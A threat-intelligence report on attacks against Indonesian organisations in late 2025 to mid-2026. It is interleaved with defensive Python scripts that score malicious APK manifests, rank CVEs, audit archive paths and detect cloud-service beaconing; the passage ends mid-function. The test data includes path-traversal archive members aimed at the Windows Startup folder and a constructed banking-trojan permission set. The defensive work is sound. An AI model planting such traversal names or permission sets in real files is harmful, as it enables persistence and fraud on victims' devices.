THREAT LANDSCAPE INDONESIA

Published On : 2026-06-29

EXECUTIVE SUMMARY

This report provides a threat intelligence assessment of the cyber risk landscape affecting Indonesian organizations between December 2025 and May 2026. The findings reflect a high-tempo, multi-vector environment driven by financially motivated ransomware operations, state-aligned espionage campaigns, industrialized mobile banking fraud, and persistent botnet compromise across government, financial, critical infrastructure, and citizen-facing digital services.

Ransomware remained the most disruptive threat category, with established and emerging operators maintaining consistent targeting across government, materials, healthcare, and information technology sectors through double-extortion tactics. State-aligned threat actors, primarily Chinese state-linked groups, conducted strategically timed espionage operations against government ministries, law enforcement, aviation, and critical minerals infrastructure, with campaigns calibrated to Indonesia’s domestic political and economic calendar.

Mobile banking fraud represented the most direct population-scale financial threat, with industrialized attack chains targeting Android users through phishing, social engineering, and malicious application delivery timed to the national tax filing season. Indonesia ranked seventh globally for active botnet compromise as of May 2026, with consumer IoT infrastructure extensively exploited as attack infrastructure. Successor botnet variants emerged rapidly following international law enforcement disruption in March 2026, confirming that structural vulnerabilities in Indonesian IoT ecosystems remain unresolved.

Dark web and underground forum activity targeting Indonesian data sets remained persistently elevated across all months of the reporting period, spanning political, healthcare, government, and education sector entities.

AI-weaponization of attack techniques, including deepfake-enabled fraud and adaptive malware evasion, accelerated materially during the period and is assessed as a growing force multiplier for adversaries targeting Indonesian organizations. Indonesia’s regulatory framework is advancing, but the transition period between legislative progress and full enforcement operationalization creates a window that sophisticated actors are positioned to exploit. Current security investment remains structurally insufficient relative to the scale of the threat environment, and organizations must treat continued multi-vector targeting as a baseline assumption, prioritizing resilience, detection maturity, and proactive threat intelligence as operational imperatives.

KEY FINDINGS

Ransomware Remains the Dominant Disruptive Threat
Ransomware activity continued to represent the most operationally and financially impactful risk to Indonesian organizations across the reporting period. LockBit5 and CoinbaseCartel led observed incident volumes, each accounting for approximately 20 percent of tracked cases, with Everest and WorldLeaks forming a consistent second tier at approximately 15 percent each. Double-extortion tactics combining encryption with data exfiltration were standard across campaigns. The fragmented RaaS ecosystem, with smaller groups including Medusa, SpaceBears, and RansomHouse accounting for additional incidents, demonstrated that Indonesia’s exposure extends well beyond the leading operators.

Government and Materials Sectors Are the Most Heavily Targeted
The Materials sector and Government and Civic organizations recorded the highest ransomware incident volumes, each accounting for five confirmed victims during the reporting period. Information Technology and Healthcare each registered three victims. Transportation and Logistics, Energy and Utilities, and Finance each recorded two victims. The breadth of sectoral targeting confirms the opportunistic and increasingly industrialized character of ransomware operations against Indonesian organizations regardless of sector, size, or geography.

Industrialized Mobile Banking Fraud via Coretax Impersonation
The most operationally significant campaign of the reporting period was the GoldFactory-attributed Coretax tax platform impersonation operation, which escalated sharply in January 2026 to coincide with Indonesia’s national tax filing season. The campaign combined phishing, WhatsApp impersonation of tax officers, voice phishing, and malicious APK sideloading to achieve full Android device compromise, enabling remote banking session takeover and unauthorized transactions across a potential target pool of 67 million residents. GigaBud.RAT and MMRat were deployed as the core mobile fraud toolkit within this campaign chain.

State-Aligned Espionage Campaigns Targeted Government, Aviation, and Critical Infrastructure
Amaranth-Dragon conducted the most clearly evidenced state-sponsored intrusion in Indonesia during the reporting period, exploiting CVE-2025-8088 through a fake civil servant salary decree archive timed to Indonesia’s August 2025 pay increase. Shadow Campaigns (TGR-STA-1030/UNC6619) compromised an Indonesian airline at Soekarno Hatta International Airport and government-linked systems tied to mining and aviation procurement, as part of a broader multi-country espionage operation with targeting timed to real-world diplomatic and economic developments. Both operations reflected well-resourced, strategically motivated actors rather than opportunistic intrusions.

AI-Weaponization Expanding the Attack Surface at Scale
AI-assisted phishing success rates reached 54 to 60 percent during the reporting period. Deepfake incidents increased 1,400 percent year-over-year from 2024 to 2025. Deepfake audio was weaponized in vishing campaigns impersonating bank officers and government tax officials. Underground discussions confirmed rapid acceleration in the use of generative AI for phishing automation, adaptive malware generation, and prompt-injection exploitation. Indonesia’s growing AI adoption without mature governance frameworks creates additional enterprise risk exposure assessed as materially elevated heading into the second half of 2026.

SURXRAT V5 Represents a Mature Mobile Malware-as-a-Service Threat
SURXRAT V5, operated by an Indonesia-based threat actor selling tiered access to global resellers, demonstrated mature malware-as-a-service capabilities including OTP interception, real-time banking session monitoring, and experimental AI-assisted behavioral evasion. Distribution through localized Indonesian-language lures, WhatsApp social engineering, and unofficial APK repositories confirmed the operator’s sophistication in targeting Indonesia’s mobile banking user base at scale.
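The OTP interception and banking-session control described here for SURXRAT V5, and for GigaBud.RAT and MMRat in the Coretax campaign above, rest on a small set of declarations that a sideloaded APK must request in its manifest. The following Python triage script is an added example, not part of this report or of any vendor tooling: it scores a decoded AndroidManifest.xml for those declarations and for the combination that matters most, SMS access together with an accessibility service. The package names, both sample manifests and the weights are constructed for illustration; a real APK stores its manifest in binary form and has to be decoded first (apktool or androguard are assumed for that step).

```python
"""Score an Android manifest for the declarations mobile banking trojans depend on:
SMS access (OTP interception), an accessibility service and overlay permission
(session control), and self-installation rights. Added example; the manifests are
constructed plain XML and the weights are illustrative, not a published scheme."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"
A_PERMISSION = f"{{{ANDROID_NS}}}permission"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Assumption: weights tuned for a triage queue, not a formal risk model.
PERMISSION_WEIGHTS = {
    "android.permission.RECEIVE_SMS": 3,
    "android.permission.READ_SMS": 3,
    "android.permission.SYSTEM_ALERT_WINDOW": 2,
    "android.permission.REQUEST_INSTALL_PACKAGES": 2,
    "android.permission.READ_CONTACTS": 1,
    "android.permission.RECORD_AUDIO": 1,
}
SERVICE_WEIGHTS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": 4,
    "android.permission.BIND_DEVICE_ADMIN": 2,
}

def score_manifest(xml_text):
    """Return package name, weighted score, indicators found, and a verdict."""
    root = ET.fromstring(xml_text)
    findings, score = [], 0
    for up in root.findall("uses-permission"):
        name = up.get(A_NAME, "")
        if name in PERMISSION_WEIGHTS:
            findings.append(name)
            score += PERMISSION_WEIGHTS[name]
    app = root.find("application")
    services = app.findall("service") if app is not None else []
    receivers = app.findall("receiver") if app is not None else []
    for svc in services:
        perm = svc.get(A_PERMISSION, "")
        if perm in SERVICE_WEIGHTS:
            findings.append("service:" + perm)
            score += SERVICE_WEIGHTS[perm]
    for rcv in receivers:
        actions = {a.get(A_NAME) for f in rcv.findall("intent-filter") for a in f.findall("action")}
        if SMS_RECEIVED in actions:
            findings.append("receiver:" + SMS_RECEIVED)
            score += 2
    # The combination is the tell: SMS access plus accessibility control is what turns
    # an intercepted OTP into a completed transaction on the victim's own device.
    has_sms = any(f.endswith(("RECEIVE_SMS", "READ_SMS")) for f in findings)
    has_a11y = any(f.endswith("BIND_ACCESSIBILITY_SERVICE") for f in findings)
    if has_sms and has_a11y:
        findings.append("combo:otp-interception-with-ui-control")
        score += 3
    verdict = "high" if score >= 8 else "medium" if score >= 4 else "low"
    return {"package": root.get("package"), "score": score,
            "findings": findings, "verdict": verdict}

# Constructed manifest resembling a sideloaded "tax helper" lure (hypothetical package).
LURE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="id.example.pajak.helper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="Pajak Helper">
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999"><action android:name="{SMS_RECEIVED}"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed benign manifest for comparison (hypothetical package).
BENIGN_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="id.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>"""

if __name__ == "__main__":
    for m in (LURE_MANIFEST, BENIGN_MANIFEST):
        r = score_manifest(m)
        print(f"{r['package']}: score {r['score']} -> {r['verdict']}; {', '.join(r['findings'])}")
```

The score is only a queueing aid: a legitimate SMS app also declares RECEIVE_SMS, which is why the single permissions carry less weight than the accessibility-plus-SMS combination and why the verdict should feed a review, not an automatic block.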

SilverFox Expanded Tax-Themed Fraud Operations to Include Indonesian Targets
SilverFox, a China-linked cybercrime group, expanded a multi-country tax-themed phishing operation to include Indonesian organizations during January and February 2026, deploying the ValleyRAT backdoor alongside the previously undocumented ABCDoor Python implant. More than 1,600 malicious emails were recorded across tracked waves, targeting industrial, consulting, retail, and transportation sector organizations with fake tax authority correspondence engineered to exploit compliance anxieties.

Cloud Platforms Abused for Command-and-Control Across Multiple Threat Actors
Lotus Blossom migrated C2 infrastructure to Dropbox, Twitter/X, and Zimbra mail services. Amaranth-Dragon used Dropbox to stage payloads and employed Cloudflare-fronted, geofenced infrastructure so that command-and-control servers responded only to IP ranges in the targeted countries. This consistent pattern of legitimate platform abuse across multiple threat actor groups materially reduced detection visibility through conventional network monitoring and represents a structural detection challenge for Indonesian defenders.

Indonesia Ranks Seventh Globally for Botnet-Related Compromise
As of early May 2026, approximately 68,000 to 85,000 active compromised Indonesian IPs were identified involving routers, DVRs, IP cameras, and Android IoT devices. The Aisuru and Kimwolf Mirai-derived botnets infected an estimated one to four million devices globally with significant Indonesian concentration, enabling DDoS attacks exceeding 200 million requests per second and reaching approximately 31.4 Tbps. Following the March 2026 international law enforcement disruption of these botnets’ infrastructure, successor variants Nexcorium and Tuxnokill rapidly emerged and continued automated exploitation of Indonesian consumer IoT infrastructure.

Dark Web Activity Targeting Indonesian Data Sets Remained Persistently Elevated
Data breach activity was the most prevalent threat category on underground forums throughout the reporting period, peaking in December 2025 and sustaining elevated volumes through May 2026. Confirmed dark web incidents included a political party data breach claim, a healthcare application user dataset of approximately 192,000 records offered at USD 200, a state-owned fisheries enterprise personnel record exposure, a government website database of 2,006 personnel records, and an Education Ministry platform data set. Hacktivist activity represented the second most prominent category, ranging from 16 incidents in December to a peak of 37 in March.

Regulatory Transition Period Creates a Temporary but Exploitable Exposure Window
Indonesia’s Cybersecurity and Cyber Resilience Bill remained pending enactment as of May 2026, and the Personal Data Protection Agency had not yet reached full operational capacity. The transition between legislative intent and enforcement operationalization creates ambiguity in oversight authority that sophisticated actors familiar with Indonesia’s regulatory calendar may seek to exploit. Organizations in early compliance preparation stages present softer security postures that are disproportionately attractive to both financially motivated and state-sponsored adversaries.

Exploitation of Legacy and Current CVEs Across Government and Enterprise Environments
CVE-2026-41940 (cPanel & WHM), CVE-2021-42013 (Apache HTTP Server), CVE-2017-9841 (PHPUnit), and CVE-2023-20198 (Cisco IOS XE) were among the most actively exploited vulnerabilities in Indonesian environments during the reporting period. Confluence was the most frequently targeted product, with seven observed incidents. The co-presence of newly disclosed and long-standing unpatched vulnerabilities confirms a structural patch management deficit across Indonesian government and enterprise infrastructure.

RANSOMWARE ASSESSMENT

Ransomware activity remains a significant threat in Indonesia, with a mix of established and emerging groups contributing to the overall attack landscape.

Figure 1: Ransomware Group Targeting Indonesia

At the top tier, LockBit5 and CoinbaseCartel are the most active groups, each accounting for approximately 20% of the total observed incidents. Their leading share suggests sustained operational capability, effective victim targeting, and continued prominence within the ransomware ecosystem.

A second tier is formed by Everest and WorldLeaks, each representing roughly 15% of observed incidents. Their presence indicates consistent campaign activity and an ability to maintain operational momentum, although at a lower scale than the leading groups.

The next level of activity includes Tengu, TheGentlemen, and Nova, each contributing approximately 10% of the total incidents. These actors demonstrate moderate levels of activity, likely reflecting more selective targeting strategies or smaller operational footprints.

The remaining portion of the landscape consists of Medusa, SpaceBears, and RansomHouse, each accounting for approximately 5% of observed incidents. While their individual shares are relatively small, their continued presence highlights the fragmented nature of the ransomware ecosystem, where numerous smaller groups remain capable of conducting disruptive attacks and exploiting vulnerable organizations.

Figure 2: Industries Targeted

The Materials sector and Government & Civic organizations were the most heavily targeted industries, each recording five victims. Their prominence suggests that attackers are prioritizing organizations whose disruption can result in significant operational, financial, or societal impact, potentially increasing the likelihood of ransom payments.

Information Technology and Healthcare followed, each accounting for three victims. These sectors remain attractive targets due to their critical role in supporting business operations and managing sensitive information, making service disruptions particularly costly.

Moderate levels of targeting were observed across Transportation & Logistics, Energy & Utilities, and Finance, with two victims recorded in each sector. The continued attention on these industries reflects attackers’ interest in organizations that support essential infrastructure and economic activity.

The remaining activity was distributed among Manufacturing, Real Estate & Construction, Automotive, and Education, each reporting one victim. While these sectors experienced fewer incidents during the reporting period, their inclusion highlights the opportunistic nature of ransomware campaigns, which continue to affect organizations across a wide range of industries regardless of size or sector.

RANSOMWARE INCIDENTS

On May 29, 2026, the ransomware group Nova claimed to have targeted an Indonesian government service provider. The group alleged that it had gained access to approximately 8 GB of data and threatened to release the data if negotiations were not completed within the specified timeframe. The nature of the compromised data was not disclosed.

On Apr. 5, 2026, the ransomware group Nova added a government service provider in Indonesia to its data leak site. The published data is claimed to be approximately 4 GB.

On Mar. 2, 2026, the ransomware group LockBit5 added an Indonesia-based energy and natural resources provider to their data leak site, and allegedly exposed data associated with the organization.

On Feb. 21, 2026, the ransomware group TheGentlemen reportedly targeted an Indonesian airline service provider.

VULNERABILITIES IN FOCUS

Based on the 90-day average detection rates, CVE-2026-41940 ranks highest among the observed vulnerabilities, followed by CVE-2026-3055, CVE-2021-42013, CVE-2017-9841, and CVE-2023-20198. The prominence of both recently disclosed vulnerabilities and long-standing flaws highlights the dual challenge facing defenders: rapidly responding to emerging threats while continuing to address legacy weaknesses that remain widely exposed. The sustained activity surrounding older vulnerabilities demonstrates that attackers consistently exploit unpatched systems, whereas the appearance of newer CVEs reflects the ongoing adaptation of threat actors to newly discovered attack opportunities. Together, these trends underscore the importance of timely patch management, continuous monitoring, and proactive vulnerability remediation across both modern and legacy environments.

CVE ID | CVSS | Products Affected | Threat Actors | Exploit Available | Exploitation Context
CVE-2026-41940 | 9.8 | cPanel & WHM | Mr_Rot13 | Yes | Initial access and web hosting infrastructure compromise
CVE-2026-3055 | 9.8 | Citrix NetScaler ADC and NetScaler Gateway | None attributed | Yes | Remote exploitation of internet-facing access infrastructure
CVE-2021-42013 | 9.8 | Apache HTTP Server | Storm-1061 | Yes | Path traversal and remote code execution on vulnerable web servers
CVE-2017-9841 | 9.8 | PHPUnit | RondoDox botnet, Zerobot/Mirai | Yes | Remote code execution through exposed PHPUnit testing scripts
CVE-2023-20198 | 10.0 | Cisco IOS XE Software | Salt Typhoon | Yes | Authentication bypass, privileged account creation, and persistent access

Confluence was the most frequently targeted product, accounting for seven observed incidents. Its importance highlights the continued exploitation of collaboration and knowledge-management platforms, which often contain sensitive organizational data and are commonly exposed to external networks.

Junos OS (J-Web), with four incidents, indicates sustained interest in network management interfaces that can provide direct administrative access to critical infrastructure devices.

Several products recorded two incidents each, including Endpoint Manager Mobile (EPMM), Citrix ADC and Citrix Gateway, TeamCity, GeoServer, and PAN-OS. These platforms span remote access, device management, software development, and network security functions, making them attractive targets for threat actors seeking initial access, privilege escalation, or lateral movement opportunities.

The remaining activity was observed against cPanel and WHM, Apache HTTP Server, and PHPUnit, each accounting for one incident. Although less frequently targeted during the reporting period, these products remain notable due to their widespread deployment and history of exploitation in both opportunistic and targeted attacks.

Overall, the distribution demonstrates that attackers continue to prioritize externally accessible enterprise applications, management interfaces, and infrastructure services, leveraging both recently disclosed vulnerabilities and long-standing weaknesses to gain unauthorized access to organizational environments.
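The ranking above is stated as a 90-day average of detection rates, then read against CVSS and exploit availability. The Python below is an added example of that calculation, not the report's own tooling: it computes the trailing-window mean per CVE (days with no detections count as zero, as an average over a fixed window implies) and combines it with the CVSS score and exploit-availability flag from the table into a single patch priority. The daily detection records are constructed, and the 50/30/20 weighting is an assumption; the point it demonstrates is that a spike outside the window must not move the ranking, while a vulnerability that appeared only recently still surfaces.

```python
"""Trailing 90-day detection average per CVE, combined with CVSS and exploit
availability into a patch priority. Added example; records and weights are constructed."""
from collections import defaultdict
from datetime import date, timedelta

AS_OF = date(2026, 5, 31)

# CVSS and exploit availability as given in the table above.
CATALOG = {
    "CVE-2026-41940": (9.8, True),
    "CVE-2021-42013": (9.8, True),
    "CVE-2017-9841": (9.8, True),
    "CVE-2023-20198": (10.0, True),
}

def window_average(records, as_of=AS_OF, days=90):
    """Mean daily detections per CVE over the window ending at as_of (inclusive).
    records: iterable of (date, cve, count). Days without a record count as zero."""
    start = as_of - timedelta(days=days - 1)
    totals = defaultdict(int)
    for day, cve, count in records:
        if start <= day <= as_of:
            totals[cve] += count
    return {cve: total / days for cve, total in totals.items()}

def rank_cves(records, catalog=CATALOG, as_of=AS_OF):
    """[(cve, avg_daily, priority)] sorted by priority, highest first.
    Assumption: priority = 0.5 * volume relative to the busiest CVE
                         + 0.3 * CVSS / 10 + 0.2 if a public exploit exists."""
    avgs = window_average(records, as_of)
    busiest = max(avgs.values(), default=0.0) or 1.0
    ranked = []
    for cve, avg in avgs.items():
        cvss, exploit = catalog.get(cve, (0.0, False))
        prio = 0.5 * (avg / busiest) + 0.3 * (cvss / 10.0) + (0.2 if exploit else 0.0)
        ranked.append((cve, round(avg, 3), round(prio, 3)))
    ranked.sort(key=lambda row: row[2], reverse=True)
    return ranked

def build_sample_records():
    """Constructed daily counts: two steady CVEs, one that only appeared 30 days ago,
    and one with a large spike 100 days back that a correct window must ignore."""
    records = []
    for back in range(120):
        day = AS_OF - timedelta(days=back)
        records.append((day, "CVE-2026-41940", 4))
        records.append((day, "CVE-2021-42013", 2))
        records.append((day, "CVE-2017-9841", 1))
        if back < 30:
            records.append((day, "CVE-2023-20198", 3))
    records.append((AS_OF - timedelta(days=100), "CVE-2017-9841", 500))
    return records

if __name__ == "__main__":
    for cve, avg, prio in rank_cves(build_sample_records()):
        print(f"{cve}: {avg:.2f} detections/day, priority {prio:.3f}")
```

With these inputs the old PHPUnit spike is discarded, the recently surfaced Cisco IOS XE flaw lands on par with it by volume, and its CVSS 10.0 is what lifts it above PHPUnit in the final order.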

DARK-WEB AND UNDERGROUND CHATTER

Entities in Indonesia continued to be disproportionately targeted by threat actors operating on underground forums and dark web marketplaces. Our monitoring identified numerous underground posts, data sales, and breached database advertisements specifically targeting organizations in Indonesia across financial, government, telecom, and industrial sectors. The prevalence of Indonesia-specific data sales, combined with active discussions among cybercriminals regarding exploitation techniques targeting local infrastructure, indicates sustained interest in the region as a high-priority target. The following analysis details the types of data being traded, threat actor activity patterns, and strategic implications for Indonesian organizations.

Data breach activity remained the most prevalent threat category throughout the reporting period, consistently accounting for the highest number of observed incidents. Peak activity was recorded in December, followed by elevated levels in January, February, March, and April before declining to 70 incidents in May. This sustained volume suggests continued attacker focus on data theft for financial gain, extortion, and unauthorized resale, often enabled through compromised credentials, exposed services, and exploitation of vulnerable internet-facing systems.

Hacktivism represented the second most prominent activity type, ranging from 16 incidents in December to a peak of 37 incidents in March, before declining to 27 incidents in May. The persistence of hacktivist operations indicates ongoing use of cyber activity to advance political, ideological, or social objectives, particularly during periods of heightened geopolitical tension.

Web exploitation activity remained consistently observed across all months, reaching its highest level in December (42) and maintaining moderate levels thereafter. This trend highlights the continued use of vulnerable web applications, exposed management interfaces, and unpatched services as common initial access vectors for threat actors.

DDoS activity remained comparatively limited, fluctuating between 6 and 20 incidents during most months. Although less frequent than other threat categories, its continued presence suggests that denial-of-service attacks remain a viable tactic for disruption, coercion, or diversionary purposes when combined with other malicious activities.

Data leak incidents were the least frequently observed category, with only isolated occurrences throughout the reporting period. However, their persistence demonstrates that unauthorized disclosure of sensitive information continues to pose a risk, particularly when associated with broader breach or extortion campaigns.

Overall, the data indicates a threat landscape dominated by data breach operations, supported by persistent hacktivist campaigns and web exploitation activity, while DDoS attacks and data leaks remain secondary but recurring elements of the broader cyber threat environment.

APT ACTIVITY IN INDONESIA

Amaranth-Dragon (APT41 Nexus) – Chinese State-Aligned
Amaranth-Dragon represented the most clearly evidenced threat against Indonesia during the reporting period. Active since at least March 2025, the group ran narrowly scoped campaigns across Southeast Asia tailored to local political and economic events. On August 18, 2025, it targeted Indonesia with an archive disguised as an official civil servant salary decree, timed to coincide with a genuine 8 percent salary increase that took effect on August 1, 2025. This campaign marked the first observed use of CVE-2025-8088, a WinRAR path traversal flaw, to drop a malicious script into the Windows Startup folder for persistence. A separate early September 2025 campaign against Indonesia distributed a password-protected RAR archive from Dropbox delivering TGAmaranth RAT, a Telegram-controlled remote access trojan.

Across the region, the group paired a custom Amaranth Loader with the Havoc C2 framework, using Cloudflare fronted infrastructure with strict geofencing so command-and-control servers only responded to targeted countries. Tooling and infrastructure overlaps point to a direct affiliation or shared resourcing with APT41, suggesting this activity is part of a broader Chinese state-aligned intelligence collection effort focused on government and law-enforcement targets.

Target Industries: Government institutions and law enforcement agencies across Southeast Asia, including Indonesia.

Target Technologies: WinRAR (CVE-2025-8088), Windows systems, Startup folder persistence mechanisms, Cloudflare-fronted infrastructure.

Initial Access: Spear-phishing with RAR archives using geopolitically and locally themed lures, such as a fake civil servant salary decree timed to Indonesia’s August 2025 salary increase.

Key TTPs: Exploitation of CVE-2025-8088 to drop malicious files into Startup folders, geofenced command and control that only responds to regional IP addresses, custom Amaranth Loader, Havoc C2 framework, Telegram-controlled TGAmaranth RAT, AES encrypted payloads decrypted in memory.

Motivations: Long-term geopolitical intelligence collection against government and law-enforcement targets, campaigns timed to coincide with sensitive local political developments and official decisions.
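The Amaranth-Dragon lure above worked because the extractor wrote a member wherever the archive said to, including the Startup folder. The Python below is an added example, not from the report or any vendor, of the pre-extraction audit that closes this class of bug whatever the container: each member name is rejected if it is absolute, climbs out of the destination, names an NTFS alternate data stream, or lands in an autostart location, and the resolved path is checked a second time after joining it to the destination. A zip archive stands in for RAR because it is in the standard library; the member names, the decoy contents and the autostart marker list are constructed assumptions.

```python
"""Audit archive member paths before extraction and extract only the safe ones.
Added example; the sample archive and its contents are constructed placeholders."""
import io
import ntpath
import os
import posixpath
import tempfile
import zipfile

# Autostart locations a document archive never needs to write (assumption: extend per estate).
AUTOSTART_MARKERS = (
    "microsoft/windows/start menu/programs/startup",
    "microsoft/windows/currentversion/run",
)

def audit_member(member):
    """Return the policy violations for one member name; empty means it may be extracted."""
    reasons = []
    norm = member.replace("\\", "/").lower()
    if ntpath.isabs(member) or posixpath.isabs(norm) or (len(norm) > 1 and norm[1] == ":"):
        reasons.append("absolute path")
    if ".." in norm.split("/"):
        reasons.append("parent-directory traversal")
    if ":" in norm.rsplit("/", 1)[-1]:          # NTFS name:stream syntax on the final component
        reasons.append("alternate data stream")
    if any(marker in norm for marker in AUTOSTART_MARKERS):
        reasons.append("autostart location")
    return reasons

def extract_safely(zip_bytes, dest):
    """Extract members that pass audit_member; returns the relative paths written."""
    written = []
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if audit_member(info.filename):
                continue
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            # Second line of defence: the resolved path must still sit under dest.
            if os.path.commonpath([dest_real, target]) != dest_real:
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.relpath(target, dest_real))
    return written

def build_sample_archive():
    """Constructed archive: a decoy decree plus members a safe extractor must refuse.
    All contents are placeholders, not real payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Surat_Keputusan_Gaji_2025.pdf", b"%PDF-1.4 decoy")
        zf.writestr("images/logo.png", b"\x89PNG decoy")
        zf.writestr("../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.cmd",
                    b"echo placeholder")
        zf.writestr("C:\\Windows\\Temp\\x.exe", b"MZ placeholder")
        zf.writestr("notes.txt:hidden", b"placeholder")
    return buf.getvalue()

def demo():
    """Extract the constructed archive into a scratch directory; returns what was written."""
    with tempfile.TemporaryDirectory() as scratch:
        return extract_safely(build_sample_archive(), scratch)

if __name__ == "__main__":
    for name in zipfile.ZipFile(io.BytesIO(build_sample_archive())).namelist():
        print(f"{name!r}: {audit_member(name) or 'ok'}")
    print("written:", demo())
```

The name check and the resolved-path check are deliberately redundant: the first produces a reason a reviewer can read, the second catches whatever the first does not anticipate, such as a symlinked destination.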

Shadow Campaigns / TGR-STA-1030 / UNC6619 – State-Aligned, Likely Asia Based
Shadow Campaigns was one of the largest state-aligned espionage operations identified globally during the reporting period, with confirmed Indonesian compromises occurring within a broader campaign spanning 37 countries and reconnaissance touching 155 nations between November and December 2025. First identified by Unit 42 while investigating phishing against European governments, the group demonstrated a clear focus on countries in Asia and Oceania bordering the South China Sea and the Gulf of Thailand, routinely probing Indonesia, Thailand, and Vietnam.

Within Indonesia, the group compromised an Indonesian airline operating out of Soekarno Hatta International Airport, assessed as likely linked to competing aircraft procurement interests, along with access to law enforcement and airport linked government systems tied to mining and aviation developments. The group used Microsoft Exchange exploitation, Cobalt Strike, and a custom Linux rootkit, with targeting consistently timed to real world diplomatic and economic events rather than appearing opportunistic, reflecting a well-resourced actor pursuing sustained strategic intelligence collection.

Target Industries: Government ministries, law enforcement and border control, aviation, critical infrastructure, finance and trade related departments.

Target Technologies: Microsoft Exchange, SSH services, Linux systems, enterprise network infrastructure.

Initial Access: Exploitation of known vulnerabilities, phishing campaigns, targeted reconnaissance and scanning of government infrastructure.

Key TTPs: Use of Cobalt Strike, custom Linux rootkit, Exchange exploitation, large scale reconnaissance preceding intrusion, targeting timed to align with economic and diplomatic developments such as mining and aviation procurement activity.

Motivations: Strategic, economic and political intelligence collection, with confirmed compromise of an Indonesian airline at Soekarno Hatta International Airport linked to aircraft procurement interests, alongside access to law enforcement and airport linked government systems.

Lotus Blossom / Lotus Panda / Billbug – Chinese State-Linked
Lotus Blossom’s link to Indonesia rests mainly on a long historical footprint rather than a confirmed incident within this specific window. Active since at least 2009, the group has been described since 2015 as targeting government and military entities across Hong Kong, Taiwan, Vietnam, the Philippines, and Indonesia, making Indonesia part of its longstanding regional interest even without a freshly disclosed Indonesia specific intrusion in this period.

The group’s most significant confirmed activity in the window was a Notepad++ supply chain compromise, tracked as CVE-2025-15556, running between June and December 2025 and disclosed in February 2026. By hijacking the WinGUp updater’s unverified update mechanism, the group selectively delivered a new backdoor named Chrysalis to confirmed victims in the Philippines, Vietnam, El Salvador, and Australia. Indonesia does not appear among the named victims. Separately, the group continued using its Sagerunex backdoor with cloud-based command and control through Dropbox, Twitter/X, and Zimbra webmail, though this shift was documented in early to mid-2025 and predates the current reporting window.

Lotus Blossom remains a credible long-term threat to Indonesia given its history and its willingness to exploit software supply chains, but the specific intrusions confirmed during this period point to other countries rather than Indonesia itself.

Target Industries: Government agencies, telecommunications, military and defense adjacent organizations, manufacturing, critical infrastructure (historical targeting pattern includes Indonesia, though the specific 2024 to 2026 campaigns documented do not name Indonesia as a confirmed victim).

Target Technologies: Windows systems, Notepad++ update infrastructure (WinGUp), cloud platforms including Dropbox, Twitter/X and Zimbra mail systems, Chrome browser credential stores.

Initial Access: Spear-phishing with malicious attachments, watering hole attacks, supply chain compromise through the Notepad++ update mechanism (CVE-2025-15556).

Key TTPs: Sagerunex modular backdoor, Chrysalis backdoor delivered via DLL sideloading, cloud-based command and control blending with legitimate traffic, credential extraction from browsers, reverse SSH tooling, living off the land techniques using legitimate administrative utilities.

Motivations: Long-term government and military intelligence collection across Southeast Asia, with Indonesia named in the group’s broader historical target set since at least 2015, though confirmed victims in the most recent disclosed campaigns are the Philippines, Vietnam, El Salvador and Australia rather than Indonesia directly.
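Both Lotus Blossom's Dropbox, Twitter/X and Zimbra command-and-control and Amaranth-Dragon's Dropbox staging behind geofenced Cloudflare infrastructure (see also the Key Findings) defeat destination-based blocking, because the destination is a service the business already uses. Two signals survive that blending when a proxy or EDR log records the originating process: a process that has no reason to talk to a file-sharing API, and connection intervals far more regular than a human session produces. The Python below is an added example, not from the report or any vendor product, of that detection run over constructed log lines; the log format, host and process lists, and thresholds are assumptions to be tuned for a given estate.

```python
"""Flag periodic beaconing to legitimate cloud services from unexpected processes.
Added example; the log format, watch lists and sample lines are constructed."""
import statistics
from collections import defaultdict
from datetime import datetime

# Legitimate services commonly abused as C2 relays (assumption: extend for your estate).
WATCHED_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "api.twitter.com", "api.x.com"}
# Processes expected to reach those hosts (assumption: browsers and the official client).
EXPECTED_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "Dropbox.exe"}

def parse_line(line):
    """Constructed log format: '<ISO timestamp> <workstation> <process> <destination> <bytes>'."""
    ts, host, proc, dest, nbytes = line.split()
    return {"ts": datetime.fromisoformat(ts), "host": host, "proc": proc,
            "dest": dest, "bytes": int(nbytes)}

def find_beacons(lines, min_hits=4, max_cv=0.15):
    """Return [(workstation, process, destination, reasons)] for traffic to a watched
    host that comes from an unexpected process, or whose inter-arrival times have a
    coefficient of variation <= max_cv (a machine-driven cadence), or both."""
    series = defaultdict(list)
    for rec in map(parse_line, lines):
        if rec["dest"] in WATCHED_HOSTS:
            series[(rec["host"], rec["proc"], rec["dest"])].append(rec["ts"])
    findings = []
    for (host, proc, dest), stamps in sorted(series.items()):
        stamps.sort()
        reasons = []
        if proc not in EXPECTED_PROCESSES:
            reasons.append("unexpected process")
        if len(stamps) >= max(min_hits, 2):
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
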